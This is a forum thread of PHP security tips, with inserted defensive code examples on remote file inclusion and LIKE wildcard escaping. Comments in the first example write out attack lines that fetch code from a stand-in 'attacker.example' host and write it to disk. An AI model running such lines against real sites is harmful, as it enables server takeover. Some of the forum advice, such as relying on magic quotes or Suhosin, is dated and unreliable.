Hi, I'm a professional (well, I hope I am) PHP web developer. I'm also a consulting programmer for a small web hosting company. In my job I have to track how websites were hacked and figure out a way to patch those websites so they are less hackable in the future. Unfortunately, during my experience I found tons of web hosting security problems, most of which are mainly due to PHP script vulnerabilities. We found out that the more complicated and popular content management systems (as examples of large PHP projects), such as WordPress, Joomla, Drupal, EzPublish, and around 95 others, are extremely vulnerable, mainly due to "forgotten" or "insecure" PHP statements in conjunction with PHP global configurations, which enable miscellaneous web visitors to "hack" into the system. Most of the common types seem to be remote file inclusions using unsecured variables. In order to have your website relatively hack-proof you should follow my 3-step basic PHP script security guide. Note that those are not all the possible ones, but they are pretty much the most popular ones. Hope this helps. Cheers, Venetsian. P.S. If you know some other security tips, please post here! I'm constantly learning new stuff, so please post!
It's good that you mentioned "allow_url_fopen". Hackers can get more done with it than you would think. Consider the following situation: A hacker gets into some admin panel and is able to execute php via a plugin or some other method. If allow_url_fopen is enabled, it makes it extremely easy to get more code up and running because they can just stream it from a server and write it to a file.
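To make the allow_url_fopen point concrete, here is an added example (not code from the original post or from any of the CMSes mentioned): the include-from-user-input pattern that allow_url_include turns into remote code execution, a hardened allow-list version, and a runtime check of both settings. The ?page= parameter, the templates/ directory and the template names are assumptions made for this demo.

```php
<?php
// Added example (not from the original post): the remote file inclusion
// pattern that allow_url_fopen / allow_url_include turn into code execution,
// beside a hardened version and a runtime check of the two settings.
// The ?page= parameter, the templates/ directory and the template names
// are assumptions for this demo.

// Vulnerable: the include path is built from user input. With
// allow_url_include=On, ?page=http://attacker.example/shell becomes
// include('http://attacker.example/shell.php') and the fetched code runs.
// With allow_url_include=Off but allow_url_fopen=On, an attacker who can
// already run some PHP (a compromised admin panel, a plugin) can still pull
// more code down and write it out, which is what the post above describes:
//   file_put_contents('cache.php', file_get_contents('http://attacker.example/x'));
function render_page_vulnerable(string $page): void
{
    include $page . '.php';
}

// Hardened: user input only selects an entry in a fixed allow-list and is
// never used to build a path or URL, so stream wrappers cannot be reached.
const TEMPLATES = [
    'home'    => 'home.php',
    'contact' => 'contact.php',
];

function render_page_safe(string $page): void
{
    if (!array_key_exists($page, TEMPLATES)) {
        http_response_code(404);
        echo "Unknown page\n";
        return;
    }
    include __DIR__ . '/templates/' . TEMPLATES[$page];
}

// Runtime check of the settings this thread is about. Recommended php.ini:
//   allow_url_fopen = Off     (unless the application really needs remote streams)
//   allow_url_include = Off   (the default since PHP 5.2; never turn it on)
function url_wrapper_settings(): array
{
    return [
        'allow_url_fopen'   => filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN),
        'allow_url_include' => filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN),
    ];
}

foreach (url_wrapper_settings() as $name => $on) {
    printf("%-18s %s\n", $name, $on ? 'On  (risky)' : 'Off (good)');
}
render_page_safe($_GET['page'] ?? 'home');
```

Run it from the command line to see the two settings as the active php.ini has them; the page rendering expects a templates/ directory beside the script. The essential change is that the allow-list version never lets the request decide which file or URL gets opened, so it is safe even on a host where allow_url_fopen stays On.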
Yes, that's pretty much the case with hacked WordPress blogs, where the theme files are overwritten with other content. Or they upload a PHP trojan to the server. It's a pretty common attack. Cheers, Venetsian.
Good tips for a beginner programmer. Any professional developer should know these, but they're great for those without the experience. I have also seen the use of LIKE attacks lately for database injection (MySQL), which even mysql_real_escape_string doesn't protect against. Things like this are an ongoing task, which is exactly why I read anything and everything about security in PHP. In fact, it's about all I read up on with PHP anymore; you can never be too secure, and new vulnerabilities are discovered all the time. Thanks for sharing, and keep sharing what you find. BTW, using addcslashes protects against the LIKE attack. You may also try escaping all meta characters with this, maybe doing so recursively.
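The LIKE problem mentioned above is easy to see with a small table. The following is an added example (not code from the original post): a search that binds the term through a prepared statement, so quote-escaping is not even the question, yet still lets % and _ leak into the pattern, beside a version that escapes the LIKE metacharacters with addcslashes and declares the escape character. The users table, its rows and the search functions are constructed for this demo; it runs against an in-memory SQLite database so it works offline.

```php
<?php
// Added example (not from the original post): quote-escaping or parameter
// binding keeps a query syntactically intact, but LIKE still interprets
// % and _ inside the bound value. A search for "%" returns every row and
// "a_" matches "admin", "alice" and "a_min". The table and rows below are
// constructed for this demo.

// Escape the LIKE metacharacters with a backslash. addcslashes() escapes the
// backslash itself as well, so an attacker cannot supply "\%" to undo it.
function escape_like(string $term): string
{
    return addcslashes($term, '\\%_');
}

function open_demo_db(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE users (name TEXT NOT NULL)');
    $ins = $pdo->prepare('INSERT INTO users (name) VALUES (?)');
    foreach (['admin', 'alice', 'a_min', '50%off'] as $name) {
        $ins->execute([$name]);
    }
    return $pdo;
}

// Leaky: the term is bound (no quote injection possible), but the wildcards
// in it are still live.
function search_users_leaky(PDO $pdo, string $term): array
{
    $stmt = $pdo->prepare('SELECT name FROM users WHERE name LIKE ? ORDER BY name');
    $stmt->execute(['%' . $term . '%']);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened: escape the metacharacters and tell the database which escape
// character was used. SQLite has no default LIKE escape character, so the
// ESCAPE clause is required there; MySQL assumes backslash when it is omitted.
// The escape character is bound as a parameter rather than written as '\'
// in the SQL text, so PDO's placeholder parser never sees a backslash-quote.
function search_users(PDO $pdo, string $term): array
{
    $stmt = $pdo->prepare(
        'SELECT name FROM users WHERE name LIKE :pat ESCAPE :esc ORDER BY name'
    );
    $stmt->execute([':pat' => '%' . escape_like($term) . '%', ':esc' => '\\']);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$pdo = open_demo_db();
foreach (['%', 'a_', 'ad'] as $term) {
    printf("%-4s leaky: %-28s escaped: %s\n", $term,
        implode(',', search_users_leaky($pdo, $term)),
        implode(',', search_users($pdo, $term)));
}
```

With the sample rows, the leaky search for "%" returns all four names and "a_" returns a_min, admin and alice, while the escaped search returns only 50%off and a_min respectively; a normal term such as "ad" gives admin in both. Escaping the LIKE characters is a second, separate step from escaping or binding the value: the first keeps the SQL intact, the second keeps the pattern honest.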
Isn't addslashes automatically done by the system if you have "magic quotes" on? Just wondering if this might cause problems, since they are assumed to do the same thing. Venetsian.
I found one additional thing. You should all have MOD_SECURITY and SUHOSIN enabled to prevent SQL injections and protect WordPress from comment spam and bad bots. I tried it and it works fine on my servers. Cheers, Venetsian